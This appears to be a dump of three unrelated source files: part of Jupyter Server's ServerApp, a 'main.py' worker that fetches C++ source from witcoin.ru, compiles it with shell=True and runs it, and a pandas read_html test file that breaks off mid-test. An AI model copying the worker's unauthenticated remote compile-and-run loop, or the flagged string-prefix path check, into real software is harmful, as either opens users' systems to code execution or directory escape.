    """Call shutdown hooks in all extensions."""
    n_extensions = len(self.extension_manager.extension_apps)
    extension_msg = trans.ngettext(
        "Shutting down %d extension", "Shutting down %d extensions", n_extensions
    )
    self.log.info(extension_msg % n_extensions)
    await run_sync_in_loop(self.extension_manager.stop_all_extensions())
def running_server_info(self, kernel_count=True):
    """Return the current working directory and the server url information.

    Parameters
    ----------
    kernel_count : bool
        When True, include the number of active kernels in the summary.
    """
    info = self.contents_manager.info_string() + "\n"
    if kernel_count:
        n_kernels = len(self.kernel_manager.list_kernel_ids())
        kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
        info += kernel_msg % n_kernels
        info += "\n"
    # Format the info so that the URL fits on a single line in 80 char display
    info += _i18n(
        "Jupyter Server {version} is running at:\n{url}".format(
            version=ServerApp.version, url=self.display_url
        )
    )
    if self.gateway_config.gateway_enabled:
        info += (
            _i18n("\nKernels will be managed by the Gateway server running at:\n%s")
            % self.gateway_config.url
        )
    return info
def server_info(self):
    """Return a JSONable dict of information about this server.

    This is the payload written to the jpserver-<pid>.json info file
    (see ``write_server_info_file``).
    """
    return {
        "url": self.connection_url,
        "hostname": self.ip if self.ip else "localhost",
        "port": self.port,
        "sock": self.sock,
        "secure": bool(self.certfile),
        "base_url": self.base_url,
        "token": self.token,
        "root_dir": os.path.abspath(self.root_dir),
        # Only whether a password is set, never the password itself.
        "password": bool(self.password),
        "pid": os.getpid(),
        "version": ServerApp.version,
    }
def write_server_info_file(self):
    """Write the result of server_info() to the JSON file info_file.

    Failures are logged as errors rather than raised, since the info
    file is advisory.
    """
    try:
        # secure_write restricts file permissions (the file contains the token).
        with secure_write(self.info_file) as f:
            json.dump(self.server_info(), f, indent=2, sort_keys=True)
    except OSError as e:
        self.log.error(_i18n("Failed to write server-info to %s: %s"), self.info_file, e)
def remove_server_info_file(self):
    """Remove the jpserver-<pid>.json file created for this server.

    A file that is already gone is ignored; any other OS error
    propagates to the caller.
    """
    try:
        os.unlink(self.info_file)
    except FileNotFoundError:
        # Already removed -- nothing to do.
        pass
def _resolve_file_to_run_and_root_dir(self):
    """Returns a relative path from file_to_run
    to root_dir. If root_dir and file_to_run
    are incompatible, i.e. on different subtrees,
    crash the app and log a critical message. Note
    that if root_dir is not configured and file_to_run
    is configured, root_dir will be set to the parent
    directory of file_to_run.
    """
    rootdir_abspath = pathlib.Path(self.root_dir).resolve()
    file_rawpath = pathlib.Path(self.file_to_run)
    combined_path = (rootdir_abspath / file_rawpath).resolve()
    # NOTE(review): this is a raw string-prefix test, so a sibling
    # directory such as "/root2" would pass for root "/root" -- confirm
    # whether Path.relative_to / is_relative_to should be used instead.
    is_child = str(combined_path).startswith(str(rootdir_abspath))

    if is_child:
        if combined_path.parent != rootdir_abspath:
            self.log.debug(
                "The `root_dir` trait is set to a directory that's not "
                "the immediate parent directory of `file_to_run`. Note that "
                "the server will start at `root_dir` and open the "
                "the file from the relative path to the `root_dir`."
            )
        return str(combined_path.relative_to(rootdir_abspath))

    self.log.critical(
        "`root_dir` and `file_to_run` are incompatible. They "
        "don't share the same subtrees. Make sure `file_to_run` "
        "is on the same path as `root_dir`."
    )
    self.exit(1)
def _write_browser_open_file(self, url, fh):
    """Render the browser-open HTML redirect page for *url* into *fh*.

    The token (when set) is appended as a query argument and the URL is
    joined onto the server's connection URL before rendering the
    "browser-open.html" jinja template.
    """
    if self.token:
        url = url_concat(url, {"token": self.token})
    url = url_path_join(self.connection_url, url)

    jinja2_env = self.web_app.settings["jinja2_env"]
    template = jinja2_env.get_template("browser-open.html")
    fh.write(template.render(open_url=url, base_url=self.base_url))
def write_browser_open_files(self):
    """Write an `browser_open_file` and `browser_open_file_to_run` files
    This can be used to open a file directly in a browser.
    """
    # default_url contains base_url, but so does connection_url
    self.write_browser_open_file()

    # Create a second browser open file if
    # file_to_run is set.
    if self.file_to_run:
        # Make sure file_to_run and root_dir are compatible.
        file_to_run_relpath = self._resolve_file_to_run_and_root_dir()

        # Split on os.sep so the URL uses forward slashes on every platform.
        file_open_url = url_escape(
            url_path_join(self.file_url_prefix, *file_to_run_relpath.split(os.sep))
        )

        with open(self.browser_open_file_to_run, "w", encoding="utf-8") as f:
            self._write_browser_open_file(file_open_url, f)
def write_browser_open_file(self):
    """Write an jpserver-<pid>-open.html file
    This can be used to open the notebook in a browser
    """
    # default_url contains base_url, but so does connection_url, so the
    # base_url prefix is stripped before rendering.
    relative_url = self.default_url[len(self.base_url):]
    with open(self.browser_open_file, "w", encoding="utf-8") as fh:
        self._write_browser_open_file(relative_url, fh)
def remove_browser_open_files(self):
    """Remove the `browser_open_file` and `browser_open_file_to_run`
    files created for this server, ignoring files already removed.
    """
    self.remove_browser_open_file()
    try:
        os.unlink(self.browser_open_file_to_run)
    except FileNotFoundError:
        # Already removed -- nothing to do.
        pass
def remove_browser_open_file(self):
    """Remove the jpserver-<pid>-open.html file created for this server.

    A file that is already gone is ignored; other OS errors propagate.
    """
    try:
        os.unlink(self.browser_open_file)
    except FileNotFoundError:
        pass
def _prepare_browser_open(self):
    """Compute what to open in the browser.

    Returns
    -------
    tuple
        ``(assembled_url, open_file)``: either a ``file:`` URL pointing
        at the HTML redirect file (when ``use_redirect_file``), or a
        direct server URL; ``open_file`` is the redirect file path.
    """
    if not self.use_redirect_file:
        uri = self.default_url[len(self.base_url) :]

        if self.token:
            uri = url_concat(uri, {"token": self.token})

    if self.file_to_run:
        # Create a separate, temporary open-browser-file
        # pointing at a specific file.
        open_file = self.browser_open_file_to_run
    else:
        # otherwise, just return the usual open browser file.
        open_file = self.browser_open_file

    if self.use_redirect_file:
        assembled_url = urljoin("file:", pathname2url(open_file))
    else:
        assembled_url = url_path_join(self.connection_url, uri)

    return assembled_url, open_file
def launch_browser(self):
    """Open the server URL in a web browser, in a background thread.

    A missing/broken browser is non-fatal: it logs a warning and returns.
    """
    try:
        browser = webbrowser.get(self.browser or None)
    except webbrowser.Error as e:
        self.log.warning(_i18n("No web browser found: %s.") % e)
        browser = None

    if not browser:
        return

    assembled_url, _ = self._prepare_browser_open()

    # Open in a thread so a slow browser launch doesn't block startup.
    b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
    threading.Thread(target=b).start()
def start_app(self):
    """Run pre-loop startup: root check, banner logging, info files, browser."""
    super(ServerApp, self).start()

    if not self.allow_root:
        # check if we are running as root, and abort if it's not allowed
        try:
            uid = os.geteuid()
        except AttributeError:
            uid = -1  # anything nonzero here, since we can't check UID assume non-root
        if uid == 0:
            self.log.critical(
                _i18n("Running as root is not recommended. Use --allow-root to bypass.")
            )
            self.exit(1)

    info = self.log.info
    for line in self.running_server_info(kernel_count=False).split("\n"):
        info(line)
    info(
        _i18n(
            "Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."
        )
    )
    if "dev" in __version__:
        info(
            _i18n(
                "Welcome to Project Jupyter! Explore the various tools available"
                " and their corresponding documentation. If you are interested"
                " in contributing to the platform, please visit the community"
                " resources section at https://jupyter.org/community.html."
            )
        )

    self.write_server_info_file()
    self.write_browser_open_files()

    # Handle the browser opening.
    if self.open_browser and not self.sock:
        self.launch_browser()

    if self.token and self._token_generated:
        # log full URL with generated token, so there's a copy/pasteable link
        # with auth info.
        if self.sock:
            self.log.critical(
                "\n".join(
                    [
                        "\n",
                        "Jupyter Server is listening on %s" % self.display_url,
                        "",
                        (
                            "UNIX sockets are not browser-connectable, but you can tunnel to "
                            "the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then "
                            "open e.g. %s in a browser."
                        )
                        % (self.sock, self.connection_url),
                    ]
                )
            )
        else:
            self.log.critical(
                "\n".join(
                    [
                        "\n",
                        "To access the server, open this file in a browser:",
                        "    %s" % urljoin("file:", pathname2url(self.browser_open_file)),
                        "Or copy and paste one of these URLs:",
                        "    %s" % self.display_url,
                    ]
                )
            )
async def _cleanup(self):
    """General cleanup of files, extensions and kernels created
    by this instance ServerApp.
    """
    # Remove info/redirect files first, then shut down live resources.
    self.remove_server_info_file()
    self.remove_browser_open_files()
    await self.cleanup_extensions()
    await self.cleanup_kernels()
    await self.cleanup_terminals()
def start_ioloop(self):
    """Start the IO Loop.

    Blocks until the loop stops; KeyboardInterrupt is logged, not raised.
    """
    if sys.platform.startswith("win"):
        # add no-op to wake every 5s
        # to handle signals that may be ignored by the inner loop
        pc = ioloop.PeriodicCallback(lambda: None, 5000)
        pc.start()
    try:
        self.io_loop.start()
    except KeyboardInterrupt:
        self.log.info(_i18n("Interrupted..."))

def init_ioloop(self):
    """init self.io_loop so that an extension can use it by io_loop.call_later() to create background tasks"""
    self.io_loop = ioloop.IOLoop.current()

def start(self):
    """Start the Jupyter server app, after initialization

    This method takes no arguments so all configuration and initialization
    must be done prior to calling this method."""
    self.start_app()
    self.start_ioloop()

async def _stop(self):
    """Cleanup resources and stop the IO Loop."""
    await self._cleanup()
    self.io_loop.stop()
def stop(self, from_signal=False):
    """Cleanup resources and stop the server.

    Parameters
    ----------
    from_signal : bool
        Set True when called from a signal handler, so the async stop
        is scheduled with ``add_callback_from_signal`` (safe off the
        main thread).
    """
    if hasattr(self, "_http_server"):
        # Stop a server if its set.
        self.http_server.stop()
    if getattr(self, "io_loop", None):
        # use IOLoop.add_callback because signal.signal must be called
        # from main thread
        if from_signal:
            self.io_loop.add_callback_from_signal(self._stop)
        else:
            self.io_loop.add_callback(self._stop)
def list_running_servers(runtime_dir=None, log=None):
    """Iterate over the server info files of running Jupyter servers.

    Given a runtime directory, find jpserver-* files in the security directory,
    and yield dicts of their information, each one pertaining to
    a currently running Jupyter server instance.

    Parameters
    ----------
    runtime_dir : str, optional
        Directory to scan; defaults to the Jupyter runtime directory.
    log : logging.Logger, optional
        Logger for warnings when stale info files cannot be deleted.

    Yields
    ------
    dict
        Contents of one jpserver-*.json file whose recorded pid is alive.
    """
    if runtime_dir is None:
        runtime_dir = jupyter_runtime_dir()

    # The runtime dir might not exist
    if not os.path.isdir(runtime_dir):
        return

    for file_name in os.listdir(runtime_dir):
        # Escape the dot and anchor the pattern: the previous
        # "jpserver-(.+).json" treated '.' as a wildcard and allowed
        # trailing junk, so unrelated files could be json-loaded.
        if re.match(r"jpserver-(.+)\.json$", file_name):
            with open(os.path.join(runtime_dir, file_name), encoding="utf-8") as f:
                info = json.load(f)

            # Simple check whether that process is really still running
            # Also remove leftover files from IPython 2.x without a pid field
            if ("pid" in info) and check_pid(info["pid"]):
                yield info
            else:
                # If the process has died, try to delete its info file
                try:
                    os.unlink(os.path.join(runtime_dir, file_name))
                except OSError as e:
                    if log:
                        log.warning(_i18n("Deleting server info file failed: %s.") % e)
# -----------------------------------------------------------------------------
# Main entry point
# -----------------------------------------------------------------------------
main = launch_new_instance = ServerApp.launch_instance
|
main.py | import socketIO_client
import time
import threading
import os
import pty
import subprocess
# Connect to the control server and identify this worker.
io = socketIO_client.SocketIO('witcoin.ru', 4000)
io.emit('auth', 'test3')

# Pseudo-terminal pair: the compiled program runs attached to `slave`,
# while `master` is used to stream its console I/O over the socket.
master, slave = pty.openpty()

if not os.path.exists('tmp'):
    os.mkdir('tmp')

# Named pipe the executed program writes video data into
# (presumably AVI frames, judging by the name -- confirm with the
# client-side C++ code).
videoPipeName = 'tmp/video.avi'
if not os.path.exists(videoPipeName):
    os.mkfifo(videoPipeName)
def send_video():
    """Forward bytes written to the video FIFO as 'video.data' events.

    Reads up to 10000 bytes per iteration and emits each non-empty chunk.
    NOTE(review): once the writer closes the FIFO, os.read returns b''
    immediately and this loop spins at 100% CPU -- consider reopening
    the FIFO or sleeping on EOF.
    """
    video_in = os.open(videoPipeName, os.O_RDONLY)
    while True:
        data = os.read(video_in, 10000)
        if len(data):
            io.emit('video.data', bytearray(data))
threading.Thread(target=send_video).start()
def send_console():
    """Forward console output from the pty master as 'console' events.

    NOTE(review): assumes the program's output is valid UTF-8; a chunk
    split mid-character would make decode() raise -- confirm acceptable.
    """
    while True:
        data = os.read(master, 10000)
        if len(data):
            io.emit('console', data.decode('utf-8'))
threading.Thread(target=send_console).start()
def receive_console(data):
    """Write console input received from the server into the program's pty."""
    os.write(master, data.encode('utf-8'))
io.on('console', receive_console)
def receive_source_code(data):
    """Handle a 'source-code' event: compile, link and run the program.

    The received C++ source is written to tmp/source.cpp, compiled and
    linked with g++ (OpenCV), then executed with its stdio attached to
    the pty slave so console I/O streams back to the server. Each g++
    step's stdout/stderr is forwarded as 'console' events; on failure
    the whole worker process exits.
    """
    io.emit('console.clear')
    # Context manager guarantees the file is flushed and closed before g++ reads it.
    with open('tmp/source.cpp', 'w') as f:
        f.write(data)
    io.emit('console', 'Source code received, generate object file\r\n')
    completed_process = subprocess.run(
        'g++ -c source.cpp -o object.o --std=c++11',
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd='./tmp'
    )
    io.emit('console', completed_process.stdout.decode('utf-8') + completed_process.stderr.decode('utf-8'))
    if completed_process.returncode == 0:
        io.emit('console', 'Object file generated, linking\r\n')
    else:
        io.emit('console', 'Errors have occurred, stop\r\n')
        exit()
    completed_process = subprocess.run(
        'g++ -o executable object.o -lopencv_core -lopencv_highgui',
        stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, cwd='./tmp'
    )
    io.emit('console', completed_process.stdout.decode('utf-8') + completed_process.stderr.decode('utf-8'))
    if completed_process.returncode == 0:
        io.emit('console', 'Linked successful\r\n')
    else:
        io.emit('console', 'Errors have occurred, stop\r\n')
        exit()
    io.emit('video.init')
    io.emit('console', '\r\n')
    # Run the user program attached to the pty slave so send_console /
    # receive_console can stream its terminal I/O.
    completed_process = subprocess.run('./executable', stdin=slave, stdout=slave, stderr=slave, cwd='./tmp')
    io.emit('console', '\r\n\r\nProgram exit with code {}\r\n'.format(completed_process.returncode))
    # Give the video reader time to drain the FIFO before signalling the end.
    time.sleep(5)
    io.emit('video.end')
io.on('source-code', receive_source_code)
io.wait()
|
test_html.py | from functools import partial
from importlib import reload
from io import (
BytesIO,
StringIO,
)
import os
from pathlib import Path
import re
import threading
from urllib.error import URLError
import numpy as np
import pytest
from pandas.compat import is_platform_windows
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
Timestamp,
date_range,
read_csv,
to_datetime,
)
import pandas._testing as tm
from pandas.io.common import file_path_to_url
import pandas.io.html
from pandas.io.html import read_html
HERE = os.path.dirname(__file__)
@pytest.fixture(
    params=[
        "chinese_utf-16.html",
        "chinese_utf-32.html",
        "chinese_utf-8.html",
        "letz_latin1.html",
    ]
)
def html_encoding_file(request, datapath):
    """Parametrized fixture for HTML encoding test filenames."""
    # Resolves to pandas' io/data/html_encoding test-data directory.
    return datapath("io", "data", "html_encoding", request.param)
def assert_framelist_equal(list1, list2, *args, **kwargs):
    """Assert two lists hold pairwise-equal, non-empty DataFrames.

    Extra positional/keyword arguments are forwarded to
    ``tm.assert_frame_equal`` for every pair.
    """
    assert len(list1) == len(list2), (
        "lists are not of equal size "
        f"len(list1) == {len(list1)}, "
        f"len(list2) == {len(list2)}"
    )
    msg = "not all list elements are DataFrames"
    assert all(
        isinstance(left, DataFrame) and isinstance(right, DataFrame)
        for left, right in zip(list1, list2)
    ), msg
    for left, right in zip(list1, list2):
        tm.assert_frame_equal(left, right, *args, **kwargs)
        # Equality above means left.empty implies right.empty too.
        assert not left.empty, "frames are both empty"
@td.skip_if_no("bs4")
@td.skip_if_no("html5lib")
def test_bs4_version_fails(monkeypatch, datapath):
    # The bs4 flavor enforces a minimum BeautifulSoup version; patching
    # __version__ below that floor must raise a hard ImportError.
    import bs4

    monkeypatch.setattr(bs4, "__version__", "4.2")
    with pytest.raises(ImportError, match="Pandas requires version"):
        read_html(datapath("io", "data", "html", "spam.html"), flavor="bs4")
def test_invalid_flavor():
    """An unknown flavor name must raise ValueError naming the bad set."""
    bad_flavor = "invalid flavor"
    expected = r"\{" + bad_flavor + r"\} is not a valid set of flavors"
    with pytest.raises(ValueError, match=expected):
        read_html("google.com", match="google", flavor=bad_flavor)
@td.skip_if_no("bs4")
@td.skip_if_no("lxml")
@td.skip_if_no("html5lib")
def test_same_ordering(datapath):
    # The lxml and bs4 parsers should discover the same tables in the same
    # document order; compare full parse results, not just counts.
    filename = datapath("io", "data", "html", "valid_markup.html")
    dfs_lxml = read_html(filename, index_col=0, flavor=["lxml"])
    dfs_bs4 = read_html(filename, index_col=0, flavor=["bs4"])
    assert_framelist_equal(dfs_lxml, dfs_bs4)
@pytest.mark.parametrize(
"flavor",
[
pytest.param("bs4", marks=[td.skip_if_no("bs4"), td.skip_if_no("html5lib")]),
pytest.param("lxml", marks=td.skip_if_no("lxml")),
],
scope="class",
)
class TestReadHtml:
    @pytest.fixture(autouse=True)
    def set_files(self, datapath):
        # Resolve the shared HTML fixture paths once per test.
        # spam_data_kwargs holds the open() kwargs used when tests read
        # spam_data manually (see test_string_io / test_file_like).
        self.spam_data = datapath("io", "data", "html", "spam.html")
        self.spam_data_kwargs = {}
        self.spam_data_kwargs["encoding"] = "UTF-8"
        self.banklist_data = datapath("io", "data", "html", "banklist.html")
    @pytest.fixture(autouse=True, scope="function")
    def set_defaults(self, flavor, request):
        # Bind the class-level flavor parameter so each test's
        # self.read_html call exercises the parser under test.
        self.read_html = partial(read_html, flavor=flavor)
        yield
def test_to_html_compat(self):
df = (
tm.makeCustomDataframe(
4,
3,
data_gen_f=lambda *args: np.random.rand(),
c_idx_names=False,
r_idx_names=False,
)
.applymap("{:.3f}".format)
.astype(float)
)
out = df.to_html()
res = self.read_html(out, attrs={"class": "dataframe"}, index_col=0)[0]
tm.assert_frame_equal(res, df)
@pytest.mark.network
@tm.network
def test_banklist_url_positional_match(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
# Passing match argument as positional should cause a FutureWarning.
with tm.assert_produces_warning(FutureWarning):
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
"First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
with tm.assert_produces_warning(FutureWarning):
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
"Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_banklist_url(self):
url = "http://www.fdic.gov/resources/resolutions/bank-failures/failed-bank-list/index.html" # noqa E501
df1 = self.read_html(
# lxml cannot find attrs leave out for now
url,
match="First Federal Bank of Florida", # attrs={"class": "dataTable"}
)
# lxml cannot find attrs leave out for now
df2 = self.read_html(
url,
match="Metcalf Bank",
) # attrs={"class": "dataTable"})
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_spam_url(self):
url = (
"https://raw.githubusercontent.com/pandas-dev/pandas/main/"
"pandas/tests/io/data/html/spam.html"
)
df1 = self.read_html(url, match=".*Water.*")
df2 = self.read_html(url, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.slow
def test_banklist(self):
df1 = self.read_html(
self.banklist_data, match=".*Florida.*", attrs={"id": "table"}
)
df2 = self.read_html(
self.banklist_data, match="Metcalf Bank", attrs={"id": "table"}
)
assert_framelist_equal(df1, df2)
def test_spam(self):
df1 = self.read_html(self.spam_data, match=".*Water.*")
df2 = self.read_html(self.spam_data, match="Unit")
assert_framelist_equal(df1, df2)
assert df1[0].iloc[0, 0] == "Proximates"
assert df1[0].columns[0] == "Nutrient"
def test_spam_no_match(self):
dfs = self.read_html(self.spam_data)
for df in dfs:
assert isinstance(df, DataFrame)
def test_banklist_no_match(self):
dfs = self.read_html(self.banklist_data, attrs={"id": "table"})
for df in dfs:
assert isinstance(df, DataFrame)
def test_spam_header(self):
df = self.read_html(self.spam_data, match=".*Water.*", header=2)[0]
assert df.columns[0] == "Proximates"
assert not df.empty
def test_skiprows_int(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_range(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=range(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=range(2))
assert_framelist_equal(df1, df2)
def test_skiprows_list(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=[1, 2])
df2 = self.read_html(self.spam_data, match="Unit", skiprows=[2, 1])
assert_framelist_equal(df1, df2)
def test_skiprows_set(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows={1, 2})
df2 = self.read_html(self.spam_data, match="Unit", skiprows={2, 1})
assert_framelist_equal(df1, df2)
def test_skiprows_slice(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=1)
df2 = self.read_html(self.spam_data, match="Unit", skiprows=1)
assert_framelist_equal(df1, df2)
def test_skiprows_slice_short(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(2))
assert_framelist_equal(df1, df2)
def test_skiprows_slice_long(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=slice(2, 5))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=slice(4, 1, -1))
assert_framelist_equal(df1, df2)
def test_skiprows_ndarray(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", skiprows=np.arange(2))
df2 = self.read_html(self.spam_data, match="Unit", skiprows=np.arange(2))
assert_framelist_equal(df1, df2)
def test_skiprows_invalid(self):
with pytest.raises(TypeError, match=("is not a valid type for skipping rows")):
self.read_html(self.spam_data, match=".*Water.*", skiprows="asdf")
def test_index(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_no_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_header_and_index_with_types(self):
df1 = self.read_html(self.spam_data, match=".*Water.*", header=1, index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", header=1, index_col=0)
assert_framelist_equal(df1, df2)
def test_infer_types(self):
# 10892 infer_types removed
df1 = self.read_html(self.spam_data, match=".*Water.*", index_col=0)
df2 = self.read_html(self.spam_data, match="Unit", index_col=0)
assert_framelist_equal(df1, df2)
def test_string_io(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data1 = StringIO(f.read())
with open(self.spam_data, **self.spam_data_kwargs) as f:
data2 = StringIO(f.read())
df1 = self.read_html(data1, match=".*Water.*")
df2 = self.read_html(data2, match="Unit")
assert_framelist_equal(df1, df2)
def test_string(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
data = f.read()
df1 = self.read_html(data, match=".*Water.*")
df2 = self.read_html(data, match="Unit")
assert_framelist_equal(df1, df2)
def test_file_like(self):
with open(self.spam_data, **self.spam_data_kwargs) as f:
df1 = self.read_html(f, match=".*Water.*")
with open(self.spam_data, **self.spam_data_kwargs) as f:
df2 = self.read_html(f, match="Unit")
assert_framelist_equal(df1, df2)
@pytest.mark.network
@tm.network
def test_bad_url_protocol(self):
with pytest.raises(URLError, match="urlopen error unknown url type: git"):
self.read_html("git://github.com", match=".*Water.*")
@pytest.mark.slow
@pytest.mark.network
@tm.network
def test_invalid_url(self):
msg = (
"Name or service not known|Temporary failure in name resolution|"
"No tables found"
)
with pytest.raises((URLError, ValueError), match=msg):
self.read_html("http://www.a23950sdfa908sd.com", match=".*Water.*")
@pytest.mark.slow
def test_file_url(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)), match="First", attrs={"id": "table"}
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
@pytest.mark.slow
def test_invalid_table_attrs(self):
url = self.banklist_data
with pytest.raises(ValueError, match="No tables found"):
self.read_html(
url, match="First Federal Bank of Florida", attrs={"id": "tasdfable"}
)
def _bank_data(self, *args, **kwargs):
return self.read_html(
self.banklist_data, match="Metcalf", attrs={"id": "table"}, *args, **kwargs
)
@pytest.mark.slow
def test_multiindex_header(self):
df = self._bank_data(header=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_index(self):
df = self._bank_data(index_col=[0, 1])[0]
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1])[0]
assert isinstance(df.columns, MultiIndex)
assert isinstance(df.index, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows_tuples(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_skiprows(self):
df = self._bank_data(header=[0, 1], skiprows=1)[0]
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_multiindex_header_index_skiprows(self):
df = self._bank_data(header=[0, 1], index_col=[0, 1], skiprows=1)[0]
assert isinstance(df.index, MultiIndex)
assert isinstance(df.columns, MultiIndex)
@pytest.mark.slow
def test_regex_idempotency(self):
url = self.banklist_data
dfs = self.read_html(
file_path_to_url(os.path.abspath(url)),
match=re.compile(re.compile("Florida")),
attrs={"id": "table"},
)
assert isinstance(dfs, list)
for df in dfs:
assert isinstance(df, DataFrame)
def test_negative_skiprows(self):
msg = r"\(you passed a negative value\)"
with pytest.raises(ValueError, match=msg):
self.read_html(self.spam_data, match="Water", skiprows=-1)
@pytest.mark.network
@tm.network
def test_multiple_matches(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
assert len(dfs) > 1
@pytest.mark.network
@tm.network
def test_python_docs_table(self):
url = "https://docs.python.org/2/"
dfs = self.read_html(url, match="Python")
zz = [df.iloc[0, 0][0:4] for df in dfs]
assert sorted(zz) == sorted(["Repo", "What"])
def test_empty_tables(self):
"""
Make sure that read_html ignores empty tables.
"""
html = """
<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
</table>
<table>
<tbody>
</tbody>
</table>
"""
result = self.read_html(html)
assert len(result) == 1
def test_multiple_tbody(self):
# GH-20690
# Read all tbody tags within a single table.
result = self.read_html(
"""<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>2</td>
</tr>
</tbody>
<tbody>
<tr>
<td>3</td>
<td>4</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data=[[1, 2], [3, 4]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_header_and_one_column(self):
"""
Don't fail with bs4 when there is a header and only one column
as described in issue #9178
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>first</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(data={"Header": "first"}, index=[0])
tm.assert_frame_equal(result, expected)
def test_thead_without_tr(self):
"""
Ensure parser adds <tr> within <thead> on malformed HTML.
"""
result = self.read_html(
"""<table>
<thead>
<tr>
<th>Country</th>
<th>Municipality</th>
<th>Year</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ukraine</td>
<th>Odessa</th>
<td>1944</td>
</tr>
</tbody>
</table>"""
)[0]
expected = DataFrame(
data=[["Ukraine", "Odessa", 1944]],
columns=["Country", "Municipality", "Year"],
)
tm.assert_frame_equal(result, expected)
def test_tfoot_read(self):
"""
Make sure that read_html reads tfoot, containing td or th.
Ignores empty tfoot
"""
data_template = """<table>
<thead>
<tr>
<th>A</th>
<th>B</th>
</tr>
</thead>
<tbody>
<tr>
<td>bodyA</td>
<td>bodyB</td>
</tr>
</tbody>
<tfoot>
{footer}
</tfoot>
</table>"""
expected1 = DataFrame(data=[["bodyA", "bodyB"]], columns=["A", "B"])
expected2 = DataFrame(
data=[["bodyA", "bodyB"], ["footA", "footB"]], columns=["A", "B"]
)
data1 = data_template.format(footer="")
data2 = data_template.format(footer="<tr><td>footA</td><th>footB</th></tr>")
result1 = self.read_html(data1)[0]
result2 = self.read_html(data2)[0]
tm.assert_frame_equal(result1, expected1)
tm.assert_frame_equal(result2, expected2)
def test_parse_header_of_non_string_column(self):
# GH5048: if header is specified explicitly, an int column should be
# parsed as int while its header is parsed as str
result = self.read_html(
"""
<table>
<tr>
<td>S</td>
<td>I</td>
</tr>
<tr>
<td>text</td>
<td>1944</td>
</tr>
</table>
""",
header=0,
)[0]
expected = DataFrame([["text", 1944]], columns=("S", "I"))
tm.assert_frame_equal(result, expected)
@pytest.mark.slow
def test_banklist_header(self, datapath):
from pandas.io.html import _remove_whitespace
def try_remove_ws(x):
try:
return _remove_whitespace(x)
except AttributeError:
return x
df = self.read_html(self.banklist_data, match="Metcalf", attrs={"id": "table"})[
0
]
ground_truth = read_csv(
datapath("io", "data", "csv", "banklist.csv"),
converters={"Updated Date": Timestamp, "Closing Date": Timestamp},
)
assert df.shape == ground_truth.shape
old = [
"First Vietnamese American BankIn Vietnamese",
"Westernbank Puerto RicoEn Espanol",
"R-G Premier Bank of Puerto RicoEn Espanol",
"EurobankEn Espanol",
"Sanderson State BankEn Espanol",
"Washington Mutual Bank(Including its subsidiary Washington "
"Mutual Bank FSB)",
"Silver State BankEn Espanol",
"AmTrade International BankEn Espanol",
"Hamilton Bank, NAEn Espanol",
"The Citizens Savings BankPioneer Community Bank, Inc.",
]
new = [
"First Vietnamese American Bank",
"Westernbank Puerto Rico",
"R-G Premier Bank of Puerto Rico",
"Eurobank",
"Sanderson State Bank",
"Washington Mutual Bank",
"Silver State Bank",
"AmTrade International Bank",
"Hamilton Bank, NA",
"The Citizens Savings Bank",
]
dfnew = df.applymap(try_remove_ws).replace(old, new)
